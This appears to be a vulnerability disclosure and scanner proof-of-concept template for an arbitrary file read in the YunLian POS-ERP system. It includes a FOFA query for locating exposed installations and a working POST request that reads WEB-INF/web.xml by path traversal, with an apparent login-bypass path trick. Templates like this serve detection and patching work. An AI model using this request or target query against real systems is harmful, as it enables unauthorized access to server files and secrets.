漏洞描述
YunLian POS-ERP Management System downloadFile interface has an arbitrary file read vulnerability.
An attacker can read arbitrary files by sending a specially crafted POST request.
FOFA: title="Powered By chaosZ"
yunlian-pos-erp-downloadfile-fileread: YunLian POS-ERP DownloadFile Arbitrary File Read
PoC代码[已公开]
id: yunlian-pos-erp-downloadfile-fileread
info:
name: YunLian POS-ERP DownloadFile Arbitrary File Read
author: ZacharyZcR
severity: high
verified: true
description: |
YunLian POS-ERP Management System downloadFile interface has an arbitrary file read vulnerability.
An attacker can read arbitrary files by sending a specially crafted POST request.
FOFA: title="Powered By chaosZ"
reference:
- https://github.com/wy876/POC/blob/main/%E4%BA%91%E8%BF%9EPOS-ERP%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F/%E4%BA%91%E8%BF%9EPOS-ERP%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9FdownloadFile%E5%AD%98%E5%9C%A8%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md
tags: yunlian,lfi,fileread
created: 2024/12/31
rules:
r0:
request:
method: POST
path: /admin/file!download.action;admin!login.action
body: downloadFile=../../WEB-INF/web.xml
expression: response.status == 200 && response.body.bcontains(b'<web-app') && response.body.bcontains(b'</web-app>')
expression: r0()